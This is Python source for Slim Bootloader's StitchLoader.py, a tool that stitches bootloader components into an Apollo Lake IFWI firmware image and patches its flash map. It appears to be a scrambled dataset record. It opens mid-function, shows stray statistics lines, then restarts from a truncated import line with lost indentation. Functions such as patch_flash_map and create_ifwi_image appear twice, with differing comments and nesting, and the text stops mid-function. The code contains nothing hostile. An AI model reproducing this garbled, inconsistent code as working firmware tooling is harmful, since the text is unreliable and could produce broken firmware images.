                desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP']
            if desc.sig == b'RSVD':
                # Reserved region floats at the very end of BP1.
                desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset
                continue
            comp = IFWI_PARSER.locate_component (ifwi, path)
            if not comp:
                if desc.sig == b'KEYH':
                    # Key-hash component is optional.
                    continue
                raise Exception("Cannot locate component '%s' in BPDT !" % path)
            if (desc.size == 0) and (desc.offset == 0):
                desc.size = comp.length
                desc.offset = comp.offset - bp0.offset
                continue
            if desc.size != comp.length and comp.name != 'FB':
                raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig])
            if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0):
                raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \
                                "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset))
            desc.offset = comp.offset - bp0.offset
            # Last 4k in bios region is reserved for bootloader, throw Exception if any component falls in that range
            if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length):
                raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig])
        limit = bp1.offset + bp1.length - bp0.offset - 0x40000
        for idx in range (entry_num):
            desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
            if desc.sig == b'RSVD':
                continue
            # Last 256K flash space (4GB - 256KB to 4GB) is remapped to CSME read-only SRAM on APL
            # Directly access is not available.
            if desc.offset >= limit or desc.offset + desc.size > limit:
                print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part))
    print ("Flash map was patched successfully!")
    return 0
def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir):
    """Stitch Slim Bootloader components into a base IFWI image.

    Reads *ifwi_in*, strips the existing IBB/OBB payloads, optionally
    mirrors BP0's BPDT into BP1 (redundant layout), adds the stitched
    components from *stitch_dir*, patches the flash map, and writes the
    result to *ifwi_out* (and the BIOS region alone to *bios_out* when
    given).  Raises on unsupported/Boot-Guard-enabled base images or on
    any failed manipulation step.
    """
    redundant_payload = True
    ifwi_data = bytearray (get_file_data (ifwi_in))
    root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
    if not root:
        raise Exception ('Invalid IFWI input image format !')
    # Verify if Boot Guard is enabled or not
    comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType")
    if not comp:
        raise Exception ('Unsupported base image format !')
    data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32]
    if (data[0] & 0x0F) != 0x00:
        raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !')
    print ('Creating %sredundant image ...' % ('non-' if non_redundant else ''))
    # Remove all in IBB/OBB
    remove_list = [
        "IFWI/BIOS/BP0/BPDT/BpdtIbb",
        "IFWI/BIOS/BP1/BPDT/BpdtIbb",
        "IFWI/BIOS/BP1/SBPDT/BpdtObb"
    ]
    for dir_path in remove_list:
        comp = IFWI_PARSER.locate_component (root, dir_path)
        if not comp:
            continue
        for each in comp.child:
            # Manifests/metadata (.man/.met) must stay in place.
            if each.name.endswith('.man') or each.name.endswith('.met'):
                continue
            ret = manipulate_ifwi ('REMOVE', dir_path + '/' + each.name, ifwi_data)
            if ret != 0:
                raise Exception ('REMOVE failed (error code %d) !' % (ret))
    # Copy BP0 BPDT into BP1 BPDT
    if not non_redundant:
        ret = manipulate_ifwi ('COPY', '', ifwi_data)
        if ret != 0:
            raise Exception ('COPY failed (error code %d) !' % (ret))
    if stitch_dir:
        # (component name in BPDT, Stitch_<name>.bin file suffix) pairs.
        ibb_list = [
            ('IBBL' , 'IBBL'),
            ('IBB' , 'IBBM'),
            ('OBB' , 'OBB'),
            ('FWUP' , 'FWU'),
            ('CFGD' , 'CFGDATA'),
            ('KEYH' , 'KEYHASH'),
            ('VAR' , 'VAR'),
            ('MRCD' , 'MRCDATA'),
            ('PLD' , 'PLD'),
        ]
        obb_list = [
            ('FB' , 'FB'),
            ('EPLD' , 'EPLD'),
            ('UVAR' , 'UVAR'),
            ('PLD' , 'PLD'),
        ]
        # optional components
        opt_list = [
            'EPLD', 'UVAR'
        ]
        # The payload goes into IBB for a redundant layout, otherwise into OBB.
        if redundant_payload:
            del obb_list[-1]
        else:
            del ibb_list[-1]
        bp1sbpdt = "IFWI/BIOS/BP1/SBPDT/BpdtObb/"
        loop = 1 if non_redundant else 2
        for bp in range(loop):
            dir = "IFWI/BIOS/BP%d/BPDT/BpdtIbb/" % bp
            for comp_name, file_name in ibb_list:
                file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
                ret = manipulate_ifwi ('ADD', dir + comp_name, ifwi_data, file_path)
                if ret != 0:
                    raise Exception ('ADD failed (error code %d) !' % (ret))
        for comp_name, file_name in obb_list:
            if file_name == '':
                file_path = ''
            else:
                file_path = os.path.join(stitch_dir, 'Stitch_%s.bin' % file_name)
            if (comp_name in opt_list) and not os.path.exists(file_path):
                # Optional component without a stitch file: silently skip.
                ret = 0
            else:
                ret = manipulate_ifwi ('ADD', bp1sbpdt + comp_name, ifwi_data, file_path)
            if ret != 0:
                raise Exception ('ADD failed (error code %d) !' % (ret))
        patch_flash_map (ifwi_data, platform_data)
    if bios_out:
        print ('Creating BIOS image ...')
        bios = IFWI_PARSER.locate_component (root, 'IFWI/BIOS')
        fd = open (bios_out, 'wb')
        fd.write(ifwi_data[bios.offset:bios.offset+bios.length])
        fd.close()
    print ('Creating IFWI image ...')
    fd = open (ifwi_out, 'wb')
    fd.write(ifwi_data)
    fd.close()
    print ('Done!')
def print_ifwi_layout (ifwi_file):
    """Parse *ifwi_file* and print its component tree to stdout.

    Prints 'Invalid IFWI image' instead when the file cannot be parsed.
    Always returns 0.
    """
    parser = IFWI_PARSER()
    raw = bytearray(get_file_data(ifwi_file))
    tree = parser.parse_ifwi_binary(raw)
    if not tree:
        print('Invalid IFWI image')
    else:
        parser.print_tree(tree)
    return 0
if __name__ == '__main__':
    # Parse hexadecimal command-line values such as 0x12345678.
    hexstr = lambda x: int(x, 16)
    ap = argparse.ArgumentParser()
    ap.add_argument('-i',
                    '--input-ifwi-file',
                    dest='ifwi_in',
                    type=str,
                    required=True,
                    help='specify input template IFWI image file path')
    ap.add_argument('-o',
                    '--output-ifwi-file',
                    dest='ifwi_out',
                    type=str,
                    default='',
                    help='specify generated output IFWI image file path')
    ap.add_argument('-b',
                    '--output-bios-region',
                    dest='bios_out',
                    type=str,
                    default='',
                    help='specify generated output BIOS region image file path')
    ap.add_argument('-s',
                    '--sitch-zip-file',
                    dest='stitch_in',
                    type=str,
                    default='',
                    help='specify input sitching zip package file path')
    ap.add_argument('-p',
                    '--platform-data',
                    dest='plat_data',
                    type=hexstr,
                    default=0xFFFFFFFF,
                    help='specify a platform specific data (HEX, DWORD) for customization')
    ap.add_argument('-n',
                    '--non-redundant',
                    dest='non_redundant',
                    action="store_true",
                    help='specify if the flash layout will be full redundant or not')
    # With no arguments at all, show the extended usage text before argparse
    # reports the missing required '-i' option.
    if len(sys.argv) == 1:
        print('%s' % extra_usage_txt)
    args = ap.parse_args()
    if args.ifwi_out == '' and args.stitch_in == '':
        # View-only mode: just dump the layout of the input image.
        print_ifwi_layout (args.ifwi_in)
        sys.exit (0)
    else:
        if args.ifwi_out and args.stitch_in == '':
            # No stitch package: regenerate the IFWI from the base image only.
            ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, None)
            sys.exit (ret)
        # Unpack files from zip
        print ("Unpacking sitching ZIP package ...")
        output_dir = os.path.dirname(args.ifwi_out)
        stitch_dir = os.path.join(output_dir, 'stitch_comp')
        if os.path.exists(stitch_dir):
            shutil.rmtree(stitch_dir)
        zf = zipfile.ZipFile(args.stitch_in, 'r', zipfile.ZIP_DEFLATED)
        zf.extractall(stitch_dir)
        zf.close()
        # Create new IFWI
        ret = create_ifwi_image (args.ifwi_in, args.ifwi_out, args.bios_out, args.plat_data, args.non_redundant, stitch_dir)
        # Remove extracted files
        if os.path.exists(stitch_dir):
            shutil.rmtree(stitch_dir)
        sys.exit (ret)
| 38.896552
| 154
| 0.590772
|
port re
import sys
import struct
import argparse
import zipfile
import shutil
from ctypes import *
from subprocess import check_output
from functools import reduce
sys.dont_write_bytecode = True
sblopen_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), '../../../'))
if not os.path.exists (sblopen_dir):
sblopen_dir = os.getenv('SBL_SOURCE', '')
sys.path.append (os.path.join(sblopen_dir, 'BootloaderCorePkg' , 'Tools'))
try:
from IfwiUtility import *
except ImportError:
err_msg = "Cannot find IfwiUtility module!\n"
err_msg += "Please make sure 'SBL_SOURCE' environment variable is set to open source SBL root folder."
raise ImportError(err_msg)
extra_usage_txt = \
"""This script creates a new Apollo Lake Slim Bootloader IFWI image basing
on an existing IFWI base image. Please note, this stitching method will work
only if Boot Guard in the base image is not enabled, and the silicon is not
fused with Boot Guard enabled.
Please follow steps below:
1. Download an existing Apollo Lake UEFI IFWI image associated with the target platform,
such as MinnowBoard 3, LeafHill, etc. The URL is below:
https://firmware.intel.com/projects/minnowboard3
Alternatively, the original IFWI image from the onboard SPI flash can be
read out as the base image too.
2. Build Slim Bootloader source tree and generate a stitching ZIP package.
The generated ZIP package is located at:
$(WORKSPACE)/Outputs/apl/Stitch_Components.zip
3. Stitch to create a new IFWI image.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin -s
Stitch_Components.zip -o SlimBoot.bin
4. Optionally, to view the flash layout for an given IFWI image,
specify '-i' option only.
EX:
python StitchLoader.py -i LEAFHILD.X64.0070.R01.1805070352.bin
"""
FILE_ALIGN = 0x1000
class IFWI_MANIPULATE:
    """In-place editing operations on a parsed IFWI component tree.

    All methods take the tree root produced by IFWI_PARSER.parse_ifwi_binary()
    and, where they touch raw bytes, the mutable bytearray of the whole image.
    Methods return 0 on success and a negative error code on failure.
    """

    def add_component (self, root, path, before = '$', file_path = ''):
        """Insert a new FILE component (last segment of *path*) into its parent
        PART directory.  *before* picks the insertion point: '$' appends,
        '^' prepends, any other value names the sibling to insert before.
        Returns 0, or -1/-2/-3 (parent missing / not a PART / anchor missing).
        """
        nodes = path.split('/')
        parent_path = '/'.join(nodes[:-1])
        dir_comp = IFWI_PARSER.locate_component (root, parent_path)
        if not dir_comp:
            print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
            return -1
        if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
            print ('Can only add FILE type !')
            return -2
        index = None
        if before == '$':
            # Append after the last child.
            index = len(dir_comp.child)
        elif before == '^':
            # Prepend before the first child.
            index = 0
        else:
            for idx, file in enumerate(dir_comp.child):
                if before == file.name:
                    index = idx
        if index is None:
            print ('Cannot find FILE %s !' % before)
            return -3
        else:
            # 0x1000 is used as a placeholder length when no backing file is given.
            length = os.path.getsize(file_path) if file_path else 0x1000
            comp = COMPONENT (nodes[-1], COMPONENT.COMP_TYPE['FILE'], 0, length)
            comp.set_data (file_path)
            dir_comp.add_child (comp, index)
            return 0

    def remove_component (self, root, path):
        """Delete the FILE component named by *path* from its parent PART.
        Returns 0, or -1/-2/-3 (parent missing / not a PART / file missing).
        """
        nodes = path.split('/')
        parent_path = '/'.join(nodes[:-1])
        dir_comp = IFWI_PARSER.locate_component (root, parent_path)
        if not dir_comp:
            print ('Cannot find DIR %s !' % '/'.join(nodes[:-1]))
            return -1
        if dir_comp.type != COMPONENT.COMP_TYPE['PART']:
            print ('Can only replace FILE type !')
            return -2
        index = None
        for idx, file in enumerate(dir_comp.child):
            if file.name == nodes[-1]:
                index = idx
                break
        if index is None:
            print ('Cannot find FILE %s !' % path)
            return -3
        else:
            del dir_comp.child[index]
            return 0

    def replace_component (self, root, path, file_path):
        """Replace the payload of the FILE component at *path* with the
        contents of *file_path* (or a 0x1000-byte placeholder if empty).
        Returns 0, or -1/-2 (component missing / not a FILE).
        """
        comp = IFWI_PARSER.locate_component (root, path)
        if not comp:
            print ('Cannot find FILE %s !' % path)
            return -1
        if comp.type != COMPONENT.COMP_TYPE['FILE']:
            print ('Can only replace FILE type !' % path)
            return -2
        comp.length = os.path.getsize(file_path) if file_path else 0x1000
        if file_path:
            comp.set_data (file_path)
        return 0

    def copy_component (self, root, path, ifwi_data):
        """Duplicate BP0's BPDT into BP1 (for a redundant flash layout),
        shifting BP1's existing SBPDT behind it and fixing up both BPDT
        headers' entry offsets/sizes directly in *ifwi_data*.
        Returns 0, or -1 if BP1 cannot hold the result.
        """
        print ("COPY BP0 BPDT to BP1 BPDT ...")
        bp1 = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1')
        bp0bpdt  = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP0/BPDT')
        bp1bpdt  = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/BPDT')
        bp1sbpdt = IFWI_PARSER.locate_component (root, 'IFWI/BIOS/BP1/SBPDT')
        # Snapshot the source regions before overwriting anything.
        bp0bpdt_data  = bytearray(ifwi_data[bp0bpdt.offset :bp0bpdt.offset  + bp0bpdt.length])
        bp1sbpdt_data = bytearray(ifwi_data[bp1sbpdt.offset:bp1sbpdt.offset + bp1sbpdt.length])
        bp1sbpdt_offset = bp1bpdt.offset + bp0bpdt.length
        ifwi_data[bp1bpdt.offset:bp1sbpdt_offset] = bp0bpdt_data
        bp1sbpdt_end_offset = bp1sbpdt_offset + bp1sbpdt.length
        ifwi_data[bp1sbpdt_offset:bp1sbpdt_end_offset] = bp1sbpdt_data
        padding = bp1.offset + bp1.length - bp1sbpdt_end_offset
        if padding < 0:
            print ('Insufficiant space in BP1 partition !')
            return -1
        # Erase (0xFF-fill) the tail of BP1 left over after the shift.
        ifwi_data[bp1sbpdt_end_offset:bp1sbpdt_end_offset + padding] = b'\xff' * padding
        # Fix the copied BPDT: its SBPDT entry size must match BP1's SBPDT.
        offset = bp1bpdt.offset
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
        offset  += sizeof(BPDT_HEADER)
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
            if "BpdtSbpdt" == str(bpdt_entry.type):
                bpdt_entry.sub_part_size = bp1sbpdt.length
            offset += sizeof(BPDT_ENTRY)
        # Fix the shifted SBPDT: all entry offsets moved by the size delta.
        offset = bp1sbpdt_offset
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, offset)
        offset  += sizeof(BPDT_HEADER)
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, offset)
            bpdt_entry.sub_part_offset += (bp0bpdt.length - bp1bpdt.length)
            offset += sizeof(BPDT_ENTRY)
        print ("Done!")
        return 0

    def create_dir_data (self, dir, ifwi_data):
        """Serialize a BpdtIbb/BpdtObb directory (header, entry table and all
        child payloads, with per-child alignment padding) into a bytearray,
        recomputing the directory checksum.  Raises for other directory names.
        """
        support_list = ["BpdtIbb", "BpdtObb"]
        if dir.name not in support_list:
            raise Exception ('Only %s are supported !' % ' '.join(support_list))
        adjust = True
        offset = len(dir.child) * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
        sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer(ifwi_data, dir.offset)
        dir_data = bytearray(sub_dir_hdr) + b'\xff' * (offset - sizeof(SUBPART_DIR_HEADER))
        for idx, comp in enumerate(dir.child):
            delta = 0
            parts = os.path.splitext(comp.name)
            if len(parts) > 1 and parts[1] in ['.man', '.met']:
                # Manifest/metadata files are packed unaligned.
                align = 1
            elif comp.name in ['IPAD', 'OPAD']:
                align = 0x40
            else:
                # Regular payloads align to 4KB relative to flash, so account
                # for the directory's own misalignment via delta.
                align = FILE_ALIGN
                delta = dir.offset & (FILE_ALIGN - 1)
            next_offset = ((offset + delta + align - 1) & ~(align - 1))
            count = next_offset - offset
            if adjust:
                adjust = False
                count -= delta
            dir_data.extend(b'\xff' * count)
            comp_data = comp.get_data()
            if comp_data:
                dir_data.extend(comp_data)
            else:
                # No replacement data supplied: keep the bytes from the image.
                dir_data.extend(ifwi_data[comp.offset : comp.offset + comp.length])
            sub_dir = SUBPART_DIR_ENTRY()
            sub_dir.entry_name   = comp.name.encode()
            sub_dir.entry_offset = next_offset - delta
            sub_dir.entry_size   = comp.length
            sub_dir.reserved1    = 0
            sub_dir.reserved2    = 0
            entry_offset = idx * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
            dir_data[entry_offset:entry_offset+sizeof(SUBPART_DIR_ENTRY)] = bytearray(sub_dir)
            next_offset += comp.length
            offset = next_offset
        # Pad the whole directory out to a 4KB boundary.
        align = FILE_ALIGN
        next_offset = ((offset + align - 1) & ~(align - 1))
        dir_data.extend(b'\xff' * (next_offset - offset))
        # Rewrite the header with the real entry count, then the checksum
        # (two's complement of the byte sum over header + entry table).
        sub_dir_hdr = SUBPART_DIR_HEADER.from_buffer_copy(dir_data)
        sub_dir_hdr.num_of_entries = len(dir.child)
        sub_dir_hdr.checksum = 0
        dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
        length  = sub_dir_hdr.num_of_entries * sizeof(SUBPART_DIR_ENTRY) + sizeof(SUBPART_DIR_HEADER)
        sum_buf = (c_uint8 * length).from_buffer_copy(dir_data)
        sub_dir_hdr.checksum = (~sum(sum_buf) + 1) & 0xFF
        dir_data[:sizeof(SUBPART_DIR_HEADER)] = bytearray(sub_dir_hdr)
        remaining = (dir.offset + len(dir_data)) & (FILE_ALIGN - 1)
        if remaining:
            dir_data.extend(b'\xff' * (FILE_ALIGN - remaining))
        return dir_data

    def refresh_ifwi_for_dir (self, dir, ifwi_data):
        """Rebuild directory *dir* inside *ifwi_data* and propagate its size
        change upward: adjust sibling offsets/lengths up to the boot-partition
        level and patch the owning BPDT/SBPDT headers, then splice the new
        bytes into the image (padding with 0xFF when the directory shrank).
        Returns 0; raises when the layout cannot absorb the growth.
        """
        dir_data = self.create_dir_data (dir, ifwi_data)
        length = len (dir_data)
        adjust_length = length - dir.length
        if (dir.offset + length) & (FILE_ALIGN - 1):
            print ('DIR total size needs to be 4KB aligned !')
        # Remember the pre-adjustment offsets of this BP's BPDT and SBPDT.
        org_bpdt_offset  = dir.parent.parent.child[0].offset
        org_sbpdt_offset = dir.parent.parent.child[1].offset
        old_dir = dir
        # Walk up to the boot partition, shifting everything located after
        # this directory and growing each enclosing node.
        while dir.type != COMPONENT.COMP_TYPE['BP']:
            for each in dir.parent.child:
                if each.offset > dir.offset:
                    each.offset += adjust_length
            dir.length += adjust_length
            dir = dir.parent
        dir = old_dir
        parent = dir.parent
        # Update the owning (S)BPDT's entry for this directory.
        bpdt_hdr = BPDT_HEADER.from_buffer(ifwi_data, parent.offset)
        base = parent.offset + sizeof(BPDT_HEADER)
        found = False
        for idx in range(bpdt_hdr.desc_cnt):
            bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base + idx * sizeof(BPDT_ENTRY))
            comps = [x for x in parent.child if x.name == str(bpdt_entry.type)]
            if len(comps) == 0:
                continue
            if len(comps) > 1:
                raise Exception ('Found duplicated DIR %s !', bpdt_entry.type)
            bpdt_entry.sub_part_offset = comps[0].offset - parent.parent.offset
            if dir.name == str(bpdt_entry.type):
                bpdt_entry.sub_part_size = length
                found = True
        if not found:
            raise Exception ('Could not find DIR %s !', dir.name)
        bp_comp = parent.parent
        if parent.name == 'BPDT':
            # The BPDT grew, so every entry in the trailing SBPDT shifts.
            bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_sbpdt_offset)
            bpdt_hdr.xor_sum = 0
            base_offset = org_sbpdt_offset + sizeof(BPDT_HEADER)
            for idx in range(bpdt_hdr.desc_cnt):
                bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
                bpdt_entry.sub_part_offset += adjust_length
                if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
                    raise Exception ('Insufficiant space in layout !')
        else:
            # The SBPDT grew: only its size entry in the primary BPDT changes.
            bpdt_hdr = BPDT_HEADER.from_buffer (ifwi_data, org_bpdt_offset)
            bpdt_hdr.xor_sum = 0
            base_offset = org_bpdt_offset + sizeof(BPDT_HEADER)
            for idx in range(bpdt_hdr.desc_cnt):
                bpdt_entry = BPDT_ENTRY.from_buffer(ifwi_data, base_offset + idx * sizeof(BPDT_ENTRY))
                if str(bpdt_entry.type) == "BpdtSbpdt":
                    bpdt_entry.sub_part_size += adjust_length
                if (bpdt_entry.sub_part_offset + bpdt_entry.sub_part_size) > bp_comp.length:
                    raise Exception ('Insufficiant space in layout !')
        # Splice the rebuilt directory into the image, keeping the boot
        # partition's total size constant (drop or add 0xFF tail bytes).
        if adjust_length > 0:
            ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
                           ifwi_data[old_dir.offset + old_dir.length - adjust_length : bp_comp.offset + bp_comp.length - adjust_length] + \
                           ifwi_data[bp_comp.offset + bp_comp.length:]
        else:
            adjust_length = -adjust_length
            ifwi_data[:] = ifwi_data[:old_dir.offset] + dir_data + \
                           ifwi_data[old_dir.offset + old_dir.length + adjust_length: bp_comp.offset + bp_comp.length] + \
                           b'\xff' * adjust_length + ifwi_data[bp_comp.offset + bp_comp.length:]
        return 0
def manipulate_ifwi (action, path, ifwi_data, file_name = '', before = '$'):
    """Apply one IFWI edit (*action* in ADD/REMOVE/REPLACE/COPY) at *path*
    and, on success, rebuild the affected directory inside *ifwi_data*.

    Returns the operation's status code (0 on success, -100 for an
    unknown action, negative codes from the individual operations).
    """
    print ('%s %s ...' % (action, path))
    root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
    op = IFWI_MANIPULATE()
    # Dispatch table instead of an if/elif chain; COPY ignores *path* and
    # always duplicates BP0's BPDT.
    handlers = {
        "REMOVE":  lambda: op.remove_component(root, path),
        "ADD":     lambda: op.add_component(root, path, before, file_name),
        "REPLACE": lambda: op.replace_component(root, path, file_name),
        "COPY":    lambda: op.copy_component(root, 'IFWI/BIOS/BP0/BPDT', ifwi_data),
    }
    handler = handlers.get(action)
    ret = handler() if handler else -100
    if ret == 0 and path:
        # Re-serialize the parent directory so the raw image matches the tree.
        parent_path = '/'.join(path.split('/')[:-1])
        parent_dir = IFWI_PARSER.locate_component(root, parent_path)
        op.refresh_ifwi_for_dir(parent_dir, ifwi_data)
    print ('done!')
    return ret
def patch_flash_map (image_data, platform_data = 0xffffffff):
    """Patch the Slim Bootloader flash map embedded at the end of Stage1A
    so its entries track the actual BPDT component layout, and store
    *platform_data* in the Stage1A trailer.  Runs once per boot partition
    (BP0, BP1).  Returns 0 on success, -1 if the image does not parse,
    -2 if either boot partition is missing.
    """
    # Flash-map signature -> component path inside the IFWI tree.
    comp_bpdt_dict = {
        b'RSVD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/RSVD",
        b'IAS1' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/FB",
        b'EPLD' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/EPLD",
        b'UVAR' : "IFWI/BIOS/BP1/SBPDT/BpdtObb/UVAR",
        b'PYLD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/PLD",
        b'VARS' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/VAR",
        b'MRCD' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/MRCD",
        b'CNFG' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/CFGD",
        b'KEYH' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/KEYH",
        b'FWUP' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/FWUP",
        b'SG02' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/OBB",
        b'SG1B' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBB",
        b'SG1A' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/IBBL",
        b'_BPM' : "IFWI/BIOS/BP0/BPDT/BpdtIbb/BPM.met",
        }
    print ("Patching Slim Bootloader Flash Map table ...")
    output_image_data = image_data
    ifwi = IFWI_PARSER.parse_ifwi_binary (output_image_data)
    if not ifwi:
        return -1
    # If the payload is not in BP0's BPDT it lives in BP1's SBPDT instead.
    pld = IFWI_PARSER.locate_component (ifwi, comp_bpdt_dict[b'PYLD'])
    if not pld:
        comp_bpdt_dict[b'PYLD'] = "IFWI/BIOS/BP1/SBPDT/BpdtObb/PLD"
    bp0 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP0')
    bp1 = IFWI_PARSER.locate_component (ifwi, 'IFWI/BIOS/BP1')
    if not bp0 or not bp1:
        return -2
    for part in range(2):
        path = comp_bpdt_dict[b'SG1A'].replace("BP0", "BP%d" % part)
        comp = IFWI_PARSER.locate_component (ifwi, path)
        if not comp:
            if part == 0:
                raise Exception("Cannot locate %s !" % path)
            else:
                # Non-redundant layout: BP1 has no Stage1A, nothing to patch.
                continue
        stage1AOffset = comp.offset
        stage1ALength = comp.length
        # The last 8 bytes of Stage1A hold platform data (DWORD) followed by
        # the relative flash-map offset (DWORD).
        temp = stage1AOffset + stage1ALength - 8
        c_uint32.from_buffer (output_image_data, temp - 4).value = platform_data
        fla_map_off = (bytes_to_value(output_image_data[temp:temp+4]) + stage1ALength) & 0xFFFFFFFF
        fla_map_str = FLASH_MAP.from_buffer (output_image_data, stage1AOffset + fla_map_off)
        entry_num = (fla_map_str.length - sizeof(FLASH_MAP)) // sizeof(FLASH_MAP_DESC)
        fla_map_str.romsize = bp0.length + bp1.length
        if part == 1:
            fla_map_str.attributes |= FLASH_MAP.FLASH_MAP_ATTRIBUTES['BACKUP_REGION']
        for idx in range (entry_num):
            desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
            path = comp_bpdt_dict[desc.sig]
            if part == 1 or (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['NON_REDUNDANT']):
                path = path.replace("BP0", "BP1")
            if part == 1 and (desc.flags & FLASH_MAP.FLASH_MAP_DESC_FLAGS['REDUNDANT']):
                desc.flags |= FLASH_MAP.FLASH_MAP_DESC_FLAGS['BACKUP']
            if desc.sig == b'RSVD':
                # Reserved region is pinned to the very end of BP1.
                desc.offset = bp1.offset + bp1.length - desc.size - bp0.offset
                continue
            comp = IFWI_PARSER.locate_component (ifwi, path)
            if not comp:
                if desc.sig == b'KEYH':
                    # Key-hash component is optional.
                    continue
                raise Exception("Cannot locate component '%s' in BPDT !" % path)
            if (desc.size == 0) and (desc.offset == 0):
                # Empty placeholder entry: fill it from the BPDT component.
                desc.size = comp.length
                desc.offset = comp.offset - bp0.offset
                continue
            if desc.size != comp.length and comp.name != 'FB':
                raise Exception("Mismatch component '%s' length in FlashMap and BPDT !" % comp_bpdt_dict[desc.sig])
            if desc.sig not in [b'_BPM'] and (comp.offset & 0xFFF > 0):
                raise Exception("Component '%s' %x is not aligned at 4KB boundary, " \
                    "please adjust padding size for IPAD/OPAD in BoardConfig.py and rebuild !" % (comp_bpdt_dict[desc.sig], comp.offset))
            # Flash-map offsets are relative to the start of BP0.
            desc.offset = comp.offset - bp0.offset
            if (bp1.offset + bp1.length - 0x1000) <= (desc.offset + desc.size) <= (bp1.offset + bp1.length):
                raise Exception("Component '%s' offset is in bootloader reserved region, please try to reduce compoent size !" % comp_bpdt_dict[desc.sig])
    # NOTE(review): 0x40000 appears to be the size of the CSME memory-mapped
    # window at the top of flash -- confirm against the platform datasheet.
    limit = bp1.offset + bp1.length - bp0.offset - 0x40000
    for idx in range (entry_num):
        desc = FLASH_MAP_DESC.from_buffer (output_image_data, stage1AOffset + fla_map_off + sizeof(FLASH_MAP) + idx * sizeof(FLASH_MAP_DESC))
        if desc.sig == b'RSVD':
            continue
        if desc.offset >= limit or desc.offset + desc.size > limit:
            print("WARNING: Component '%s' in BP%d is located inside CSME memory mapped region, direct access might fail." % (desc.sig, part))
    print ("Flash map was patched successfully!")
    return 0
def create_ifwi_image (ifwi_in, ifwi_out, bios_out, platform_data, non_redundant, stitch_dir):
    """Build a Slim Bootloader IFWI from base image *ifwi_in*.

    Steps: strip the original IBB/OBB components, optionally duplicate
    BP0's BPDT into BP1 (redundant layout), add the stitched components
    from *stitch_dir* (if given), patch the flash map, and write the IFWI
    (and optionally the BIOS region) output files.  Raises on any failure.
    """
    redundant_payload = True
    ifwi_data = bytearray (get_file_data (ifwi_in))
    root = IFWI_PARSER.parse_ifwi_binary (ifwi_data)
    if not root:
        raise Exception ('Invalid IFWI input image format !')
    # Reject images where Boot Guard appears to be enabled (low nibble of
    # the UEP type byte must be 0 for this stitching method to work).
    comp = IFWI_PARSER.locate_component (root, "IFWI/BIOS/BP0/BPDT/BpdtUepType")
    if not comp:
        raise Exception ('Unsupported base image format !')
    data = ifwi_data[comp.offset + 0x30:comp.offset + 0x32]
    if (data[0] & 0x0F) != 0x00:
        raise Exception ('Unsupported base image type. boot guard might have been enabled in this image !')
    print ('Creating %sredundant image ...' % ('non-' if non_redundant else ''))
    # Remove all original FILE components (manifests/metadata stay in place).
    remove_list = [
        "IFWI/BIOS/BP0/BPDT/BpdtIbb",
        "IFWI/BIOS/BP1/BPDT/BpdtIbb",
        "IFWI/BIOS/BP1/SBPDT/BpdtObb"
    ]
    for dir_path in remove_list:
